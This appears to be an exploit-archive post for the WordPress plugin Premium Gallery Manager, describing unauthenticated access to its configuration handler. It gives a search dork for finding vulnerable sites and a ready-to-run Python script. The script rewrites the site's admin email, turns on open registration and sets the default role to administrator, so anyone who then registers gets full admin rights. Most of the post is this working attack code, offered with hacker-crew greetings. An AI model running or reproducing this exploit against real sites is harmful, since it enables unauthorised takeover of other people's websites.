#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability #Author : Hannaichi [@dntkun] #Date : February 5th, 2014 #Type : php, html, htm, asp, etc. #Category : Web Applications #Vulnerability : Unauthenticated Configuration Access #Tested On : Windows 7 32-bit | Google Chrome #Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =)) #Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php #POC : Save File As Python (.py) = import httplib, urllib #target site site = "victim" #<--- no http:// or https:// #path to ajax.php url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} conn = httplib.HTTPConnection(site) conn.request("POST", url, params, headers) response = conn.getresponse() print response.status, response.reason data = response.read() print data conn.close() ChangeOption(site, url, "admin_email", "youremail@test.com") ChangeOption(site, url, "users_can_register", "1") ChangeOption(site, url, "default_role", "administrator") print "Now register a new user, they are an administrator by default!" #Place It Broo No Lazy For This :D !! -------------------------------------------------------------------------------------------------------------------- Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*